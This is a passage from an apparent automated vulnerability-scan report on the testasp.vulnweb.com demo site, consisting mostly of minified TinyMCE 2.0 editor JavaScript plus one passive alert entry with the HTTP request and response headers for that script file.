style_class);");if(returnVal&&returnVal['href'])tinyMCE.insertLink(returnVal['href'],returnVal['target'],returnVal['title'],returnVal['onclick'],returnVal['style_class']);}else{tinyMCE.openWindow(this.insertLinkTemplate,{href:href,target:target,title:title,onclick:onclick,action:action,className:style_class});}break;case "mceImage":var src="",alt="",border="",hspace="",vspace="",width="",height="",align="";var title="",onmouseover="",onmouseout="",action="insert";var img=tinyMCE.imgElement;if(tinyMCE.selectedElement!=null&&tinyMCE.selectedElement.nodeName.toLowerCase()=="img"){img=tinyMCE.selectedElement;tinyMCE.imgElement=img;}if(img){if(tinyMCE.getAttrib(img,'name').indexOf('mce_')==0)return;src=tinyMCE.getAttrib(img,'src');alt=tinyMCE.getAttrib(img,'alt');if(alt=="")alt=tinyMCE.getAttrib(img,'title');if(tinyMCE.isGecko){var w=img.style.width;if(w!=null&&w!="")img.setAttribute("width",w);var h=img.style.height;if(h!=null&&h!="")img.setAttribute("height",h);}border=tinyMCE.getAttrib(img,'border');hspace=tinyMCE.getAttrib(img,'hspace');vspace=tinyMCE.getAttrib(img,'vspace');width=tinyMCE.getAttrib(img,'width');height=tinyMCE.getAttrib(img,'height');align=tinyMCE.getAttrib(img,'align');onmouseover=tinyMCE.getAttrib(img,'onmouseover');onmouseout=tinyMCE.getAttrib(img,'onmouseout');title=tinyMCE.getAttrib(img,'title');if(tinyMCE.isMSIE){width=img.attributes['width'].specified?width:"";height=img.attributes['height'].specified?height:"";}onmouseover=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseover));onmouseout=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseout));mceRealSrc=tinyMCE.getAttrib(img,'mce_real_src');if(mceRealSrc!="")src=mceRealSrc;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, img, true);");if(onmouseover!="")onmouseover=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, img, true);");if(onmouseout!="")onmouseout=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, img, true);");action="update";}if(this.settings['insertimage_callback']){var returnVal=eval(this.settings['insertimage_callback']+"(src, alt, border, hspace, vspace, width, height, align, title, onmouseover, onmouseout, action);");if(returnVal&&returnVal['src'])tinyMCE.insertImage(returnVal['src'],returnVal['alt'],returnVal['border'],returnVal['hspace'],returnVal['vspace'],returnVal['width'],returnVal['height'],returnVal['align'],returnVal['title'],returnVal['onmouseover'],returnVal['onmouseout']);}else tinyMCE.openWindow(this.insertImageTemplate,{src:src,alt:alt,border:border,hspace:hspace,vspace:vspace,width:width,height:height,align:align,title:title,onmouseover:onmouseover,onmouseout:onmouseout,action:action});break;case "mceCleanup":tinyMCE._setHTML(this.contentDocument,this.getBody().innerHTML);tinyMCE.setInnerHTML(this.getBody(),tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,this.getBody(),this.visualAid));tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE._setEventsEnabled(this.getBody(),false);this.repaint();tinyMCE.triggerNodeChange();break;case "mceReplaceContent":this.getWin().focus();var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(selectedText.length>0){value=tinyMCE.replaceVar(value,"selection",selectedText);tinyMCE.execCommand('mceInsertContent',false,value);}tinyMCE.triggerNodeChange();break;case "mceSetAttribute":if(typeof(value)=='object'){var targetElms=(typeof(value['targets'])=="undefined")?"p,img,span,div,td,h1,h2,h3,h4,h5,h6,pre,address":value['targets'];var targetNode=tinyMCE.getParentElement(this.getFocusElement(),targetElms);if(targetNode){targetNode.setAttribute(value['name'],value['value']);tinyMCE.triggerNodeChange();}}break;case "mceSetCSSClass":this.execCommand("SetStyleInfo",false,{command:"setattrib",name:"class",value:value});break;case "mceInsertRawHTML":var key='tiny_mce_marker';this.execCommand('mceBeginUndoLevel');this.execCommand('mceInsertContent',false,key);var scrollX=this.getDoc().body.scrollLeft+this.getDoc().documentElement.scrollLeft;var scrollY=this.getDoc().body.scrollTop+this.getDoc().documentElement.scrollTop;var html=this.getBody().innerHTML;if((pos=html.indexOf(key))!=-1)tinyMCE.setInnerHTML(this.getBody(),html.substring(0,pos)+value+html.substring(pos+key.length));this.contentWindow.scrollTo(scrollX,scrollY);this.execCommand('mceEndUndoLevel');break;case "mceInsertContent":var insertHTMLFailed=false;this.getWin().focus();if(tinyMCE.isGecko||tinyMCE.isOpera){try{this.getDoc().execCommand('inserthtml',false,value);}catch(ex){insertHTMLFailed=true;}if(!insertHTMLFailed){tinyMCE.triggerNodeChange();return;}}if(tinyMCE.isOpera&&insertHTMLFailed){this.getDoc().execCommand("insertimage",false,tinyMCE.uniqueURL);var ar=tinyMCE.getElementsByAttributeValue(this.getBody(),"img","src",tinyMCE.uniqueURL);ar[0].outerHTML=value;return;}if(!tinyMCE.isMSIE){var isHTML=value.indexOf('<')!=-1;var sel=this.getSel();var rng=this.getRng();if(isHTML){if(tinyMCE.isSafari){var tmpRng=this.getDoc().createRange();tmpRng.setStart(this.getBody(),0);tmpRng.setEnd(this.getBody(),0);value=tmpRng.createContextualFragment(value);}else value=rng.createContextualFragment(value);}else{var el=document.createElement("div");el.innerHTML=value;value=el.firstChild.nodeValue;value=doc.createTextNode(value);}if(tinyMCE.isSafari&&!isHTML){this.execCommand('InsertText',false,value.nodeValue);tinyMCE.triggerNodeChange();return true;}else if(tinyMCE.isSafari&&isHTML){rng.deleteContents();rng.insertNode(value);tinyMCE.triggerNodeChange();return true;}rng.deleteContents();if(rng.startContainer.nodeType==3){var node=rng.startContainer.splitText(rng.startOffset);node.parentNode.insertBefore(value,node);}else rng.insertNode(value);if(!isHTML){sel.selectAllChildren(doc.body);sel.removeAllRanges();var rng=doc.createRange();rng.selectNode(value);rng.collapse(false);sel.addRange(rng);}else rng.collapse(false);}else{var rng=doc.selection.createRange();if(rng.item)rng.item(0).outerHTML=value;else rng.pasteHTML(value);}tinyMCE.triggerNodeChange();break;case "mceStartTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex==-1){this.typingUndoIndex=this.undoIndex;this.execCommand('mceAddUndoLevel');}break;case "mceEndTyping":if(tinyMCE.settings['custom_undo_redo']&&this.typingUndoIndex!=-1){this.execCommand('mceAddUndoLevel');this.typingUndoIndex=-1;}break;case "mceBeginUndoLevel":this.undoRedo=false;break;case "mceEndUndoLevel":this.undoRedo=true;this.execCommand('mceAddUndoLevel');break;case "mceAddUndoLevel":if(tinyMCE.settings['custom_undo_redo']&&this.undoRedo){if(this.typingUndoIndex!=-1){this.undoIndex=this.typingUndoIndex;}var newHTML=tinyMCE.trim(this.getBody().innerHTML);if(newHTML!=this.undoLevels[this.undoIndex]){tinyMCE.executeCallback('onchange_callback','_onchange',0,this);var customUndoLevels=tinyMCE.settings['custom_undo_redo_levels'];if(customUndoLevels!=-1&&this.undoLevels.length>customUndoLevels){for(var i=0;i<this.undoLevels.length-1;i++){this.undoLevels[i]=this.undoLevels[i+1];}this.undoLevels.length--;this.undoIndex--;}this.undoIndex++;this.undoLevels[this.undoIndex]=newHTML;this.undoLevels.length=this.undoIndex+1;tinyMCE.triggerNodeChange(false);}}break;case "Undo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex>0){this.undoIndex--;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "Redo":if(tinyMCE.settings['custom_undo_redo']){tinyMCE.execCommand("mceEndTyping");if(this.undoIndex<(this.undoLevels.length-1)){this.undoIndex++;tinyMCE.setInnerHTML(this.getBody(),this.undoLevels[this.undoIndex]);this.repaint();}tinyMCE.triggerNodeChange();}else this.getDoc().execCommand(command,user_interface,value);break;case "mceToggleVisualAid":this.visualAid=!this.visualAid;tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "Indent":this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();if(tinyMCE.isMSIE){var n=tinyMCE.getParentElement(this.getFocusElement(),"blockquote");do{if(n&&n.nodeName=="BLOCKQUOTE"){n.removeAttribute("dir");n.removeAttribute("style");}}while(n!=null&&(n=n.parentNode)!=null);}break;case "removeformat":var text=this.getSelectedText();if(tinyMCE.isOpera){this.getDoc().execCommand("RemoveFormat",false,null);return;}if(tinyMCE.isMSIE){try{var rng=doc.selection.createRange();rng.execCommand("RemoveFormat",false,null);}catch(e){}this.execCommand("SetStyleInfo",false,{command:"removeformat"});}else{this.getDoc().execCommand(command,user_interface,value);this.execCommand("SetStyleInfo",false,{command:"removeformat"});}if(text.length==0)this.execCommand("mceSetCSSClass",false,"");tinyMCE.triggerNodeChange();break;default:this.getDoc().execCommand(command,user_interface,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);else tinyMCE.triggerNodeChange();}if(command!="mceAddUndoLevel"&&command!="Undo"&&command!="Redo"&&command!="mceStartTyping"&&command!="mceEndTyping")tinyMCE.execCommand("mceAddUndoLevel");};TinyMCEControl.prototype.queryCommandValue=function(command){return this.getDoc().queryCommandValue(command);};TinyMCEControl.prototype.queryCommandState=function(command){return this.getDoc().queryCommandState(command);};TinyMCEControl.prototype.onAdd=function(replace_element,form_element_name,target_document){var targetDoc=target_document?target_document:document;this.targetDoc=targetDoc;tinyMCE.themeURL=tinyMCE.baseURL+"/themes/"+this.settings['theme'];this.settings['themeurl']=tinyMCE.themeURL;if(!replace_element){alert("Error: Could not find the target element.");return false;}var templateFunction=tinyMCE._getThemeFunction('_getInsertLinkTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertLinkTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getInsertImageTemplate');if(eval("typeof("+templateFunction+")")!='undefined')this.insertImageTemplate=eval(templateFunction+'(this.settings);');var templateFunction=tinyMCE._getThemeFunction('_getEditorTemplate');if(eval("typeof("+templateFunction+")")=='undefined'){alert("Error: Could not find the template function: "+templateFunction);return false;}var editorTemplate=eval(templateFunction+'(this.settings, this.editorId);');var deltaWidth=editorTemplate['delta_width']?editorTemplate['delta_width']:0;var deltaHeight=editorTemplate['delta_height']?editorTemplate['delta_height']:0;var html='<span id="'+this.editorId+'_parent">'+editorTemplate['html'];var templateFunction=tinyMCE._getThemeFunction('_handleNodeChange',true);if(eval("typeof("+templateFunction+")")!='undefined')this.settings['handleNodeChangeCallback']=templateFunction;html=tinyMCE.replaceVar(html,"editor_id",this.editorId);this.settings['default_document']=tinyMCE.baseURL+"/blank.htm";this.settings['old_width']=this.settings['width'];this.settings['old_height']=this.settings['height'];if(this.settings['width']==-1)this.settings['width']=replace_element.offsetWidth;if(this.settings['height']==-1)this.settings['height']=replace_element.offsetHeight;if(this.settings['width']==0)this.settings['width']=replace_element.style.width;if(this.settings['height']==0)this.settings['height']=replace_element.style.height;if(this.settings['width']==0)this.settings['width']=320;if(this.settings['height']==0)this.settings['height']=240;this.settings['area_width']=parseInt(this.settings['width']);this.settings['area_height']=parseInt(this.settings['height']);this.settings['area_width']+=deltaWidth;this.settings['area_height']+=deltaHeight;if((""+this.settings['width']).indexOf('%')!=-1)this.settings['area_width']="100%";if((""+this.settings['height']).indexOf('%')!=-1)this.settings['area_height']="100%";if((""+replace_element.style.width).indexOf('%')!=-1){this.settings['width']=replace_element.style.width;this.settings['area_width']="100%";}if((""+replace_element.style.height).indexOf('%')!=-1){this.settings['height']=replace_element.style.height;this.settings['area_height']="100%";}html=tinyMCE.applyTemplate(html);this.settings['width']=this.settings['old_width'];this.settings['height']=this.settings['old_height'];this.visualAid=this.settings['visual'];this.formTargetElementId=form_element_name;if(replace_element.nodeName=="TEXTAREA"||replace_element.nodeName=="INPUT")this.startContent=replace_element.value;else this.startContent=replace_element.innerHTML;if(replace_element.nodeName.toLowerCase()!="textarea"){this.oldTargetElement=replace_element.cloneNode(true);if(tinyMCE.settings['debug'])html+='<textarea wrap="off" id="'+form_element_name+'" name="'+form_element_name+'" cols="100" rows="15"></textarea>';else html+='<input type="hidden" type="text" id="'+form_element_name+'" name="'+form_element_name+'" />';html+='</span>';if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.replaceChild(fragment,replace_element);}else replace_element.outerHTML=html;}else{html+='</span>';this.oldTargetElement=replace_element;if(!tinyMCE.settings['debug'])this.oldTargetElement.style.display="none";if(!tinyMCE.isMSIE){var rng=replace_element.ownerDocument.createRange();rng.setStartBefore(replace_element);var fragment=rng.createContextualFragment(html);replace_element.parentNode.insertBefore(fragment,replace_element);}else replace_element.insertAdjacentHTML("beforeBegin",html);}var dynamicIFrame=false;var tElm=targetDoc.getElementById(this.editorId);if(!tinyMCE.isMSIE){if(tElm&&tElm.nodeName.toLowerCase()=="span"){tElm=tinyMCE._createIFrame(tElm);dynamicIFrame=true;}this.targetElement=tElm;this.iframeElement=tElm;this.contentDocument=tElm.contentDocument;this.contentWindow=tElm.contentWindow;}else{if(tElm&&tElm.nodeName.toLowerCase()=="span")tElm=tinyMCE._createIFrame(tElm);else tElm=targetDoc.frames[this.editorId];this.targetElement=tElm;this.iframeElement=targetDoc.getElementById(this.editorId);if(tinyMCE.isOpera){this.contentDocument=this.iframeElement.contentDocument;this.contentWindow=this.iframeElement.contentWindow;dynamicIFrame=true;}else{this.contentDocument=tElm.window.document;this.contentWindow=tElm.window;}this.getDoc().designMode="on";}var doc=this.contentDocument;if(dynamicIFrame){var html=tinyMCE.getParam('doctype')+'<html><head xmlns="http://www.w3.org/1999/xhtml"><base href="'+tinyMCE.settings['base_href']+'" /><title>blank_page</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"></head><body class="mceContentBody"></body></html>';try{this.getDoc().designMode="on";doc.open();doc.write(html);doc.close();}catch(e){this.getDoc().location.href=tinyMCE.baseURL+"/blank.htm";}}if(tinyMCE.isMSIE)window.setTimeout("TinyMCE.prototype.addEventHandlers('"+this.editorId+"');",1);tinyMCE.setupContent(this.editorId,true);return true;};TinyMCEControl.prototype.getFocusElement=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){var doc=this.getDoc();var rng=doc.selection.createRange();var elm=rng.item?rng.item(0):rng.parentElement();}else{var sel=this.getSel();var rng=this.getRng();var elm=rng.commonAncestorContainer;if(!rng.collapsed){if(rng.startContainer==rng.endContainer){if(rng.startOffset-rng.endOffset<2){if(rng.startContainer.hasChildNodes())elm=rng.startContainer.childNodes[rng.startOffset];}}}elm=tinyMCE.getParentElement(elm);}return elm;};var tinyMCE=new TinyMCE();var tinyMCELang=new Array(); |
| URL | http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | select |
| Request Header - size: 347 bytes. |
GET http://testasp.vulnweb.com/jscripts/tiny_mce/tiny_mce.js HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 263 bytes. |
HTTP/1.1 200 OK
Content-Type: application/javascript Last-Modified: Thu, 29 May 2008 12:11:36 GMT Accept-Ranges: bytes ETag: "7edd7d2485c1c81:0" Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:34 GMT Content-Length: 132342 |
| Response Body - size: 132,342 bytes. |
/**
* $RCSfile: tiny_mce.js,v $ * $Revision: 1.301 $ * $Date: 2005/10/30 16:06:56 $ * * @author Moxiecode * @copyright Copyright � 2004, Moxiecode Systems AB, All rights reserved. */ function TinyMCE(){this.majorVersion="2";this.minorVersion="0RC4";this.releaseDate="2005-10-30";this.instances=new Array();this.stickyClassesLookup=new Array();this.windowArgs=new Array();this.loadedFiles=new Array();this.configs=new Array();this.currentConfig=0;this.eventHandlers=new Array();var ua=navigator.userAgent;this.isMSIE=(navigator.appName=="Microsoft Internet Explorer");this.isMSIE5=this.isMSIE&&(ua.indexOf('MSIE 5')!=-1);this.isMSIE5_0=this.isMSIE&&(ua.indexOf('MSIE 5.0')!=-1);this.isGecko=ua.indexOf('Gecko')!=-1;this.isGecko18=ua.indexOf('Gecko')!=-1&&ua.indexOf('rv:1.8')!=-1;this.isSafari=ua.indexOf('Safari')!=-1;this.isOpera=ua.indexOf('Opera')!=-1;this.isMac=ua.indexOf('Mac')!=-1;this.isNS7=ua.indexOf('Netscape/7')!=-1;this.isNS71=ua.indexOf('Netscape/7.1')!=-1;this.dialogCounter=0;if(this.isOpera){this.isMSIE=true;this.isGecko=false;this.isSafari=false;}this.idCounter=0;};TinyMCE.prototype.defParam=function(key,def_val){this.settings[key]=tinyMCE.getParam(key,def_val);};TinyMCE.prototype.init=function(settings){var theme;this.settings=settings;if(typeof(document.execCommand)=='undefined')return;if(!tinyMCE.baseURL){var elements=document.getElementsByTagName('script');for(var i=0;i<elements.length;i++){if(elements[i].src&&(elements[i].src.indexOf("tiny_mce.js")!=-1||elements[i].src.indexOf("tiny_mce_src.js")!=-1||elements[i].src.indexOf("tiny_mce_gzip.php")!=-1)){var src=elements[i].src;tinyMCE.srcMode=(src.indexOf('_src')!=-1)?'_src':'';src=src.substring(0,src.lastIndexOf('/'));tinyMCE.baseURL=src;break;}}}this.documentBasePath=document.location.href;if(this.documentBasePath.indexOf('?')!=-1)this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.indexOf('?'));this.documentURL=this.documentBasePath;this.documentBasePath=this.documentBasePath.substring(0,this.documentBasePath.lastIndexOf('/'));if(tinyMCE.baseURL.indexOf('://')==-1&&tinyMCE.baseURL.charAt(0)!='/'){tinyMCE.baseURL=this.documentBasePath+"/"+tinyMCE.baseURL;}this.defParam("mode","none");this.defParam("theme","advanced");this.defParam("plugins","",true);this.defParam("language","en");this.defParam("docs_language",this.settings['language']);this.defParam("elements","");this.defParam("textarea_trigger","mce_editable");this.defParam("editor_selector","");this.defParam("editor_deselector","mceNoEditor");this.defParam("valid_elements","+a[id|style|rel|rev|charset|hreflang|dir|lang|tabindex|accesskey|type|name|href|target|title|class|onfocus|onblur|onclick|ondblclick|onmousedown|onmouseup|onmouseover|onmousemove|onmouseout|onkeypress|onkeydown|onkeyup],-strong/b[class|style],-em/i[class|style],-strike[class|style],-u[class|style],+p[style|dir|class|align],-ol[class|style],-ul[class|style],-li[class|style],br,img[id|dir|lang|longdesc|usemap|style|class|src|onmouseover|onmouseout|border=0|alt|title|hspace|vspace|width|height|align],-sub[style|class],-sup[style|class],-blockquote[dir|style],-table[border=0|cellspacing|cellpadding|width|height|class|align|summary|style|dir|id|lang|bgcolor|background|bordercolor],-tr[id|lang|dir|class|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor],tbody[id|class],thead[id|class],tfoot[id|class],-td[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|bgcolor|background|bordercolor|scope],-th[id|lang|dir|class|colspan|rowspan|width|height|align|valign|style|scope],caption[id|lang|dir|class|style],-div[id|dir|class|align|style],-span[style|class|align],-pre[class|align|style],address[class|align|style],-h1[style|dir|class|align],-h2[style|dir|class|align],-h3[style|dir|class|align],-h4[style|dir|class|align],-h5[style|dir|class|align],-h6[style|dir|class|align],hr[class|style],font[face|size|style|id|class|dir|color]");this.defParam("extended_valid_elements","");this.defParam("invalid_elements","");this.defParam("encoding","");this.defParam("urlconverter_callback",tinyMCE.getParam("urlconvertor_callback","TinyMCE.prototype.convertURL"));this.defParam("save_callback","");this.defParam("debug",false);this.defParam("force_br_newlines",false);this.defParam("force_p_newlines",true);this.defParam("add_form_submit_trigger",true);this.defParam("relative_urls",true);this.defParam("remove_script_host",true);this.defParam("focus_alert",true);this.defParam("document_base_url",this.documentURL);this.defParam("visual",true);this.defParam("visual_table_class","mceVisualAid");this.defParam("setupcontent_callback","");this.defParam("fix_content_duplication",true);this.defParam("custom_undo_redo",true);this.defParam("custom_undo_redo_levels",-1);this.defParam("custom_undo_redo_keyboard_shortcuts",true);this.defParam("verify_css_classes",false);this.defParam("verify_html",true);this.defParam("apply_source_formatting",false);this.defParam("directionality","ltr");this.defParam("cleanup_on_startup",false);this.defParam("inline_styles",false);this.defParam("convert_newlines_to_brs",false);this.defParam("auto_reset_designmode",true);this.defParam("entities","160,nbsp,38,amp,34,quot,162,cent,8364,euro,163,pound,165,yen,169,copy,174,reg,8482,trade,8240,permil,181,micro,183,middot,8226,bull,8230,hellip,8242,prime,8243,Prime,167,sect,182,para,223,szlig,8249,lsaquo,8250,rsaquo,171,laquo,187,raquo,8216,lsquo,8217,rsquo,8220,ldquo,8221,rdquo,8218,sbquo,8222,bdquo,60,lt,62,gt,8804,le,8805,ge,8211,ndash,8212,mdash,175,macr,8254,oline,164,curren,166,brvbar,168,uml,161,iexcl,191,iquest,710,circ,732,tilde,176,deg,8722,minus,177,plusmn,247,divide,8260,frasl,215,times,185,sup1,178,sup2,179,sup3,188,frac14,189,frac12,190,frac34,402,fnof,8747,int,8721,sum,8734,infin,8730,radic,8764,sim,8773,cong,8776,asymp,8800,ne,8801,equiv,8712,isin,8713,notin,8715,ni,8719,prod,8743,and,8744,or,172,not,8745,cap,8746,cup,8706,part,8704,forall,8707,exist,8709,empty,8711,nabla,8727,lowast,8733,prop,8736,ang,180,acute,184,cedil,170,ordf,186,ordm,8224,dagger,8225,Dagger,192,Agrave,194,Acirc,195,Atilde,196,Auml,197,Aring,198,AElig,199,Ccedil,200,Egrave,202,Ecirc,203,Euml,204,Igrave,206,Icirc,207,Iuml,208,ETH,209,Ntilde,210,Ograve,212,Ocirc,213,Otilde,214,Ouml,216,Oslash,338,OElig,217,Ugrave,219,Ucirc,220,Uuml,376,Yuml,222,THORN,224,agrave,226,acirc,227,atilde,228,auml,229,aring,230,aelig,231,ccedil,232,egrave,234,ecirc,235,euml,236,igrave,238,icirc,239,iuml,240,eth,241,ntilde,242,ograve,244,ocirc,245,otilde,246,ouml,248,oslash,339,oelig,249,ugrave,251,ucirc,252,uuml,254,thorn,255,yuml,914,Beta,915,Gamma,916,Delta,917,Epsilon,918,Zeta,919,Eta,920,Theta,921,Iota,922,Kappa,923,Lambda,924,Mu,925,Nu,926,Xi,927,Omicron,928,Pi,929,Rho,931,Sigma,932,Tau,933,Upsilon,934,Phi,935,Chi,936,Psi,937,Omega,945,alpha,946,beta,947,gamma,948,delta,949,epsilon,950,zeta,951,eta,952,theta,953,iota,954,kappa,955,lambda,956,mu,957,nu,958,xi,959,omicron,960,pi,961,rho,962,sigmaf,963,sigma,964,tau,965,upsilon,966,phi,967,chi,968,psi,969,omega,8501,alefsym,982,piv,8476,real,977,thetasym,978,upsih,8472,weierp,8465,image,8592,larr,8593,uarr,8594,rarr,8595,darr,8596,harr,8629,crarr,8656,lArr,8657,uArr,8658,rArr,8659,dArr,8660,hArr,8756,there4,8834,sub,8835,sup,8836,nsub,8838,sube,8839,supe,8853,oplus,8855,otimes,8869,perp,8901,sdot,8968,lceil,8969,rceil,8970,lfloor,8971,rfloor,9001,lang,9002,rang,9674,loz,9824,spades,9827,clubs,9829,hearts,9830,diams,8194,ensp,8195,emsp,8201,thinsp,8204,zwnj,8205,zwj,8206,lrm,8207,rlm,173,shy,233,eacute,237,iacute,243,oacute,250,uacute,193,Aacute,225,aacute,201,Eacute,205,Iacute,211,Oacute,218,Uacute,221,Yacute,253,yacute");this.defParam("entity_encoding","named");this.defParam("cleanup_callback","");this.defParam("add_unload_trigger",true);this.defParam("ask",false);this.defParam("nowrap",false);this.defParam("auto_resize",false);this.defParam("auto_focus",false);this.defParam("cleanup",true);this.defParam("remove_linebreaks",true);this.defParam("button_tile_map",false);this.defParam("submit_patch",true);this.defParam("browsers","msie,safari,gecko,opera");this.defParam("dialog_type","window");this.defParam("accessibility_warnings",true);this.defParam("merge_styles_invalid_parents","");this.defParam("force_hex_style_colors",true);this.defParam("trim_span_elements",true);this.defParam("convert_fonts_to_spans",false);this.defParam("doctype",'<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">');this.defParam("font_size_classes",'');this.defParam("font_size_style_values",'xx-small,x-small,small,medium,large,x-large,xx-large');this.defParam("event_elements",'a,img');if(this.isMSIE&&this.settings['browsers'].indexOf('msie')==-1)return;if(this.isGecko&&this.settings['browsers'].indexOf('gecko')==-1)return;if(this.isSafari&&this.settings['browsers'].indexOf('safari')==-1)return;if(this.isOpera&&this.settings['browsers'].indexOf('opera')==-1)return;var baseHREF=tinyMCE.settings['document_base_url'];if(baseHREF.indexOf('?')!=-1)baseHREF=baseHREF.substring(0,baseHREF.indexOf('?'));this.settings['base_href']=baseHREF.substring(0,baseHREF.lastIndexOf('/'))+"/";theme=this.settings['theme'];this.blockRegExp=new RegExp("^(h[1-6]|p|div|address|pre|form|table|li|ol|ul|td|blockquote|center|dl|dir|fieldset|form|noscript|noframes|menu|isindex)$","i");this.posKeyCodes=new Array(13,45,36,35,33,34,37,38,39,40);this.uniqueURL='http://tinymce.moxiecode.cp/mce_temp_url';this.settings['theme_href']=tinyMCE.baseURL+"/themes/"+theme;if(!tinyMCE.isMSIE)this.settings['force_br_newlines']=false;if(tinyMCE.getParam("content_css",false)){var cssPath=tinyMCE.getParam("content_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['content_css']=this.documentBasePath+"/"+cssPath;else this.settings['content_css']=cssPath;}else this.settings['content_css']='';if(tinyMCE.getParam("popups_css",false)){var cssPath=tinyMCE.getParam("popups_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['popups_css']=this.documentBasePath+"/"+cssPath;else this.settings['popups_css']=cssPath;}else this.settings['popups_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_popup.css";if(tinyMCE.getParam("editor_css",false)){var cssPath=tinyMCE.getParam("editor_css","");if(cssPath.indexOf('://')==-1&&cssPath.charAt(0)!='/')this.settings['editor_css']=this.documentBasePath+"/"+cssPath;else this.settings['editor_css']=cssPath;}else this.settings['editor_css']=tinyMCE.baseURL+"/themes/"+theme+"/css/editor_ui.css";if(tinyMCE.settings['debug']){var msg="Debug: \n";msg+="baseURL: "+this.baseURL+"\n";msg+="documentBasePath: "+this.documentBasePath+"\n";msg+="content_css: "+this.settings['content_css']+"\n";msg+="popups_css: "+this.settings['popups_css']+"\n";msg+="editor_css: "+this.settings['editor_css']+"\n";alert(msg);}this._initCleanup();if(this.configs.length==0){if(this.isSafari&&this.getParam('safari_warning',true))alert("Safari support is very limited and should be considered experimental.\nSo there is no need to even submit bugreports on this early version.\nYou can disable this message by setting: safari_warning option to false");tinyMCE.addEvent(window,"load",TinyMCE.prototype.onLoad);if(tinyMCE.isMSIE){if(tinyMCE.settings['add_unload_trigger']){tinyMCE.addEvent(window,"unload",TinyMCE.prototype.unloadHandler);tinyMCE.addEvent(window.document,"beforeunload",TinyMCE.prototype.unloadHandler);}}else{if(tinyMCE.settings['add_unload_trigger'])tinyMCE.addEvent(window,"unload",function(){tinyMCE.triggerSave(true,true);});}}this.loadScript(tinyMCE.baseURL+'/themes/'+this.settings['theme']+'/editor_template'+tinyMCE.srcMode+'.js');this.loadScript(tinyMCE.baseURL+'/langs/'+this.settings['language']+'.js');this.loadCSS(this.settings['editor_css']);var themePlugins=tinyMCE.getParam('plugins','',true,',');if(this.settings['plugins']!=''){for(var i=0;i<themePlugins.length;i++)this.loadScript(tinyMCE.baseURL+'/plugins/'+themePlugins[i]+'/editor_plugin'+tinyMCE.srcMode+'.js');}settings['index']=this.configs.length;this.configs[this.configs.length]=settings;};TinyMCE.prototype.loadScript=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<sc'+'ript language="javascript" type="text/javascript" src="'+url+'"></script>');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.loadCSS=function(url){for(var i=0;i<this.loadedFiles.length;i++){if(this.loadedFiles[i]==url)return;}document.write('<link href="'+url+'" rel="stylesheet" type="text/css" />');this.loadedFiles[this.loadedFiles.length]=url;};TinyMCE.prototype.importCSS=function(doc,css_file){if(css_file=='')return;if(typeof(doc.createStyleSheet)=="undefined"){var elm=doc.createElement("link");elm.rel="stylesheet";elm.href=css_file;if((headArr=doc.getElementsByTagName("head"))!=null&&headArr.length>0)headArr[0].appendChild(elm);}else var styleSheet=doc.createStyleSheet(css_file);};TinyMCE.prototype.confirmAdd=function(e,settings){var elm=tinyMCE.isMSIE?event.srcElement:e.target;var elementId=elm.name?elm.name:elm.id;tinyMCE.settings=settings;if(!elm.getAttribute('mce_noask')&&confirm(tinyMCELang['lang_edit_confirm']))tinyMCE.addMCEControl(elm,elementId);elm.setAttribute('mce_noask','true');};TinyMCE.prototype.updateContent=function(form_element_name){var formElement=document.getElementById(form_element_name);for(var n in tinyMCE.instances){var inst=tinyMCE.instances[n];if(!tinyMCE.isInstance(inst))continue;inst.switchSettings();if(inst.formElement==formElement){var doc=inst.getDoc();tinyMCE._setHTML(doc,inst.formElement.value);if(!tinyMCE.isMSIE)doc.body.innerHTML=tinyMCE._cleanupHTML(inst,doc,this.settings,doc.body,inst.visualAid);}}};TinyMCE.prototype.addMCEControl=function(replace_element,form_element_name,target_document){var id="mce_editor_"+tinyMCE.idCounter++;var inst=new 